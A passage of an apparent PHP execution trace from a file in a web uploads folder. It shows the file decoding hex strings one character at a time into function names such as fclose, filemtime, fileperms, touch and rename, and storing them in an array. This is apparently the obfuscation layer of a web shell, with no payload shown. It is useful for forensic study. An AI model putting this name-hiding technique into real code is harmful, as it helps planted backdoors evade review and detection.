2	356	0	0.016705	521856	uhex	1		/var/www/html/uploads/mar.php	44	1	'66636c6f7365'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	357	0	0.016747	521888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'66'
3	357	1	0.016763	521936
3	357	R			102
3	358	0	0.016779	521856	chr	0		/var/www/html/uploads/mar.php	540	1	102
3	358	1	0.016794	521896
3	358	R			'f'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'f'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	359	0	0.016835	521920	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	359	1	0.016851	521968
3	359	R			99
3	360	0	0.016867	521888	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	360	1	0.016882	521928
3	360	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	361	0	0.016922	521920	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	361	1	0.016938	521968
3	361	R			108
3	362	0	0.016954	521888	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	362	1	0.016969	521928
3	362	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	363	0	0.017009	521920	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6f'
3	363	1	0.017025	521968
3	363	R			111
3	364	0	0.017041	521888	chr	0		/var/www/html/uploads/mar.php	540	1	111
3	364	1	0.017056	521928
3	364	R			'o'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'o'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	365	0	0.017096	521920	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	365	1	0.017111	521968
3	365	R			115
3	366	0	0.017128	521888	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	366	1	0.017142	521928
3	366	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	367	0	0.017183	521920	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	367	1	0.017199	521968
3	367	R			101
3	368	0	0.017216	521888	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	368	1	0.017230	521928
3	368	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	356	1	0.017276	521888
2	356	R			'fclose'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'fclose'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	369	0	0.017319	521888	uhex	1		/var/www/html/uploads/mar.php	44	1	'64617465'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	370	0	0.017360	521920	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	370	1	0.017376	521968
3	370	R			100
3	371	0	0.017392	521888	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	371	1	0.017407	521928
3	371	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	372	0	0.017448	521952	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	372	1	0.017464	522000
3	372	R			97
3	373	0	0.017481	521920	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	373	1	0.017507	521960
3	373	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	374	0	0.017548	521952	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	374	1	0.017564	522000
3	374	R			116
3	375	0	0.017580	521920	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	375	1	0.017595	521960
3	375	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	376	0	0.017635	521952	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	376	1	0.017650	522000
3	376	R			101
3	377	0	0.017667	521920	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	377	1	0.017681	521960
3	377	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	369	1	0.017721	521920
2	369	R			'date'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'date'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	378	0	0.017771	521920	uhex	1		/var/www/html/uploads/mar.php	44	1	'66696c656d74696d65'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	379	0	0.017813	521952	hexdec	0		/var/www/html/uploads/mar.php	540	1	'66'
3	379	1	0.017829	522000
3	379	R			102
3	380	0	0.017845	521920	chr	0		/var/www/html/uploads/mar.php	540	1	102
3	380	1	0.017861	521960
3	380	R			'f'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'f'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	381	0	0.017901	521984	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	381	1	0.017917	522032
3	381	R			105
3	382	0	0.017933	521952	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	382	1	0.017982	521992
3	382	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	383	0	0.018028	521984	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	383	1	0.018045	522032
3	383	R			108
3	384	0	0.018061	521952	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	384	1	0.018076	521992
3	384	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	385	0	0.018117	521984	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	385	1	0.018132	522032
3	385	R			101
3	386	0	0.018148	521952	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	386	1	0.018163	521992
3	386	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	387	0	0.018216	521984	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6d'
3	387	1	0.018234	522032
3	387	R			109
3	388	0	0.018250	521952	chr	0		/var/www/html/uploads/mar.php	540	1	109
3	388	1	0.018265	521992
3	388	R			'm'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'm'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	389	0	0.018306	521984	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	389	1	0.018328	522032
3	389	R			116
3	390	0	0.018345	521952	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	390	1	0.018360	521992
3	390	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	391	0	0.018400	521984	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	391	1	0.018419	522032
3	391	R			105
3	392	0	0.018436	521952	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	392	1	0.018479	521992
3	392	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	393	0	0.018560	521984	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6d'
3	393	1	0.018577	522032
3	393	R			109
3	394	0	0.018594	521952	chr	0		/var/www/html/uploads/mar.php	540	1	109
3	394	1	0.018609	521992
3	394	R			'm'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'm'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	395	0	0.018649	521992	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	395	1	0.018665	522040
3	395	R			101
3	396	0	0.018681	521960	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	396	1	0.018696	522000
3	396	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	378	1	0.018736	521960
2	378	R			'filemtime'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'filemtime'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	397	0	0.018785	521960	uhex	1		/var/www/html/uploads/mar.php	44	1	'737562737472'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	398	0	0.018828	521992	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	398	1	0.018841	522040
3	398	R			115
3	399	0	0.018853	521960	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	399	1	0.018865	522000
3	399	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	400	0	0.018895	522024	hexdec	0		/var/www/html/uploads/mar.php	540	1	'75'
3	400	1	0.018908	522072
3	400	R			117
3	401	0	0.018920	521992	chr	0		/var/www/html/uploads/mar.php	540	1	117
3	401	1	0.018931	522032
3	401	R			'u'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'u'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	402	0	0.018961	522024	hexdec	0		/var/www/html/uploads/mar.php	540	1	'62'
3	402	1	0.018973	522072
3	402	R			98
3	403	0	0.018986	521992	chr	0		/var/www/html/uploads/mar.php	540	1	98
3	403	1	0.018997	522032
3	403	R			'b'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'b'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	404	0	0.019027	522024	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	404	1	0.019039	522072
3	404	R			115
3	405	0	0.019051	521992	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	405	1	0.019063	522032
3	405	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	406	0	0.019093	522024	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	406	1	0.019104	522072
3	406	R			116
3	407	0	0.019117	521992	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	407	1	0.019128	522032
3	407	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	408	0	0.019158	522024	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	408	1	0.019173	522072
3	408	R			114
3	409	0	0.019191	521992	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	409	1	0.019205	522032
3	409	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	397	1	0.019244	521992
2	397	R			'substr'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'substr'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	410	0	0.019293	521992	uhex	1		/var/www/html/uploads/mar.php	44	1	'737072696e7466'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	411	0	0.019334	522024	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	411	1	0.019349	522072
3	411	R			115
3	412	0	0.019365	521992	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	412	1	0.019381	522032
3	412	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	413	0	0.019423	522056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	413	1	0.019439	522104
3	413	R			112
3	414	0	0.019456	522024	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	414	1	0.019472	522064
3	414	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	415	0	0.019515	522056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	415	1	0.019532	522104
3	415	R			114
3	416	0	0.019548	522024	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	416	1	0.019564	522064
3	416	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	417	0	0.019605	522056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	417	1	0.019621	522104
3	417	R			105
3	418	0	0.019638	522024	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	418	1	0.019653	522064
3	418	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	419	0	0.019696	522056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6e'
3	419	1	0.019712	522104
3	419	R			110
3	420	0	0.019730	522024	chr	0		/var/www/html/uploads/mar.php	540	1	110
3	420	1	0.019746	522064
3	420	R			'n'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'n'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	421	0	0.019787	522056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	421	1	0.019804	522104
3	421	R			116
3	422	0	0.019821	522024	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	422	1	0.019837	522064
3	422	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	423	0	0.019880	522056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'66'
3	423	1	0.019897	522104
3	423	R			102
3	424	0	0.019915	522024	chr	0		/var/www/html/uploads/mar.php	540	1	102
3	424	1	0.019931	522064
3	424	R			'f'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'f'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	410	1	0.019973	522024
2	410	R			'sprintf'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'sprintf'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	425	0	0.020020	522024	uhex	1		/var/www/html/uploads/mar.php	44	1	'66696c657065726d73'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	426	0	0.020064	522056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'66'
3	426	1	0.020081	522104
3	426	R			102
3	427	0	0.020098	522024	chr	0		/var/www/html/uploads/mar.php	540	1	102
3	427	1	0.020114	522064
3	427	R			'f'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'f'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	428	0	0.020158	522088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	428	1	0.020174	522136
3	428	R			105
3	429	0	0.020191	522056	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	429	1	0.020207	522096
3	429	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	430	0	0.020251	522088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	430	1	0.020269	522136
3	430	R			108
3	431	0	0.020286	522056	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	431	1	0.020302	522096
3	431	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	432	0	0.020354	522088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	432	1	0.020371	522136
3	432	R			101
3	433	0	0.020389	522056	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	433	1	0.020405	522096
3	433	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	434	0	0.020448	522088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	434	1	0.020464	522136
3	434	R			112
3	435	0	0.020482	522056	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	435	1	0.020497	522096
3	435	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	436	0	0.020540	522088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	436	1	0.020557	522136
3	436	R			101
3	437	0	0.020574	522056	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	437	1	0.020591	522096
3	437	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	438	0	0.020634	522088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	438	1	0.020651	522136
3	438	R			114
3	439	0	0.020669	522056	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	439	1	0.020684	522096
3	439	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	440	0	0.020727	522088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6d'
3	440	1	0.020744	522136
3	440	R			109
3	441	0	0.020761	522056	chr	0		/var/www/html/uploads/mar.php	540	1	109
3	441	1	0.020777	522096
3	441	R			'm'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'm'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	442	0	0.020820	522096	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	442	1	0.020837	522144
3	442	R			115
3	443	0	0.020854	522064	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	443	1	0.020870	522104
3	443	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	425	1	0.020913	522064
2	425	R			'fileperms'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'fileperms'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	444	0	0.020957	522064	uhex	1		/var/www/html/uploads/mar.php	44	1	'746f756368'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	445	0	0.021000	522096	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	445	1	0.021017	522144
3	445	R			116
3	446	0	0.021033	522064	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	446	1	0.021049	522104
3	446	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	447	0	0.021093	522128	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6f'
3	447	1	0.021109	522176
3	447	R			111
3	448	0	0.021127	522096	chr	0		/var/www/html/uploads/mar.php	540	1	111
3	448	1	0.021143	522136
3	448	R			'o'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'o'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	449	0	0.021185	522128	hexdec	0		/var/www/html/uploads/mar.php	540	1	'75'
3	449	1	0.021201	522176
3	449	R			117
3	450	0	0.021219	522096	chr	0		/var/www/html/uploads/mar.php	540	1	117
3	450	1	0.021234	522136
3	450	R			'u'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'u'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	451	0	0.021279	522128	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	451	1	0.021300	522176
3	451	R			99
3	452	0	0.021327	522096	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	452	1	0.021349	522136
3	452	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	453	0	0.021406	522128	hexdec	0		/var/www/html/uploads/mar.php	540	1	'68'
3	453	1	0.021437	522176
3	453	R			104
3	454	0	0.021463	522096	chr	0		/var/www/html/uploads/mar.php	540	1	104
3	454	1	0.021484	522136
3	454	R			'h'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'h'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	444	1	0.021546	522096
2	444	R			'touch'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'touch'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	455	0	0.021604	522096	uhex	1		/var/www/html/uploads/mar.php	44	1	'66696c655f657869737473'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	456	0	0.021659	522128	hexdec	0		/var/www/html/uploads/mar.php	540	1	'66'
3	456	1	0.021680	522176
3	456	R			102
3	457	0	0.021704	522096	chr	0		/var/www/html/uploads/mar.php	540	1	102
3	457	1	0.021723	522136
3	457	R			'f'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'f'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	458	0	0.021785	522160	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	458	1	0.021805	522208
3	458	R			105
3	459	0	0.021829	522128	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	459	1	0.021849	522168
3	459	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	460	0	0.021900	522160	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	460	1	0.021915	522208
3	460	R			108
3	461	0	0.021931	522128	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	461	1	0.021948	522168
3	461	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	462	0	0.022002	522160	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	462	1	0.022020	522208
3	462	R			101
3	463	0	0.022042	522128	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	463	1	0.022060	522168
3	463	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	464	0	0.022114	522160	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	464	1	0.022136	522208
3	464	R			95
3	465	0	0.022158	522128	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	465	1	0.022175	522168
3	465	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	466	0	0.022229	522160	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	466	1	0.022249	522208
3	466	R			101
3	467	0	0.022273	522128	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	467	1	0.022293	522168
3	467	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	468	0	0.022346	522160	hexdec	0		/var/www/html/uploads/mar.php	540	1	'78'
3	468	1	0.022367	522208
3	468	R			120
3	469	0	0.022392	522128	chr	0		/var/www/html/uploads/mar.php	540	1	120
3	469	1	0.022413	522168
3	469	R			'x'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'x'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	470	0	0.022462	522160	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	470	1	0.022486	522208
3	470	R			105
3	471	0	0.022507	522128	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	471	1	0.022607	522168
3	471	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	472	0	0.022672	522168	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	472	1	0.022692	522216
3	472	R			115
3	473	0	0.022714	522136	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	473	1	0.022733	522176
3	473	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	474	0	0.022784	522168	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	474	1	0.022802	522216
3	474	R			116
3	475	0	0.022823	522136	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	475	1	0.022848	522176
3	475	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	476	0	0.022900	522168	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	476	1	0.022919	522216
3	476	R			115
3	477	0	0.022940	522136	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	477	1	0.022958	522176
3	477	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	455	1	0.023009	522136
2	455	R			'file_exists'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'file_exists'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	478	0	0.023064	522136	uhex	1		/var/www/html/uploads/mar.php	44	1	'72656e616d65'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	479	0	0.023107	522168	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	479	1	0.023124	522216
3	479	R			114
3	480	0	0.023141	522136	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	480	1	0.023157	522176
3	480	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	481	0	0.023199	522200	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	481	1	0.023216	522248
3	481	R			101
3	482	0	0.023233	522168	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	482	1	0.023248	522208
3	482	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	483	0	0.023291	522200	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6e'
3	483	1	0.023306	522248
3	483	R			110
3	484	0	0.023324	522168	chr	0		/var/www/html/uploads/mar.php	540	1	110
3	484	1	0.023339	522208
3	484	R			'n'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'n'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	485	0	0.023381	522200	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	485	1	0.023398	522248
3	485	R			97
3	486	0	0.023415	522168	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	486	1	0.023431	522208
3	486	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	487	0	0.023473	522200	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6d'
3	487	1	0.023489	522248
3	487	R			109
3	488	0	0.023507	522168	chr	0		/var/www/html/uploads/mar.php	540	1	109
3	488	1	0.023523	522208
3	488	R			'm'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'm'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	489	0	0.023565	522200	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	489	1	0.023581	522248
3	489	R			101
3	490	0	0.023598	522168	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	490	1	0.023613	522208
3	490	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	478	1	0.023656	522168
2	478	R			'rename'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'rename'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	491	0	0.023702	522168	uhex	1		/var/www/html/uploads/mar.php	44	1	'69735f6172726179'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	492	0	0.023746	522200	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	492	1	0.023762	522248
3	492	R			105
3	493	0	0.023781	522168	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	493	1	0.023797	522208
3	493	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	494	0	0.023841	522232	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	494	1	0.023858	522280
3	494	R			115
3	495	0	0.023876	522200	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	495	1	0.023892	522240
3	495	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	496	0	0.023939	522232	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	496	1	0.023956	522280
3	496	R			95
3	497	0	0.023974	522200	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	497	1	0.023990	522240
3	497	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	498	0	0.024034	522232	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	498	1	0.024051	522280
3	498	R			97
3	499	0	0.024069	522200	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	499	1	0.024084	522240
3	499	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	500	0	0.024129	522232	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	500	1	0.024146	522280
3	500	R			114
3	501	0	0.024164	522200	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	501	1	0.024180	522240
3	501	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	502	0	0.024225	522232	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	502	1	0.024241	522280
3	502	R			114
3	503	0	0.024260	522200	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	503	1	0.024276	522240
3	503	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
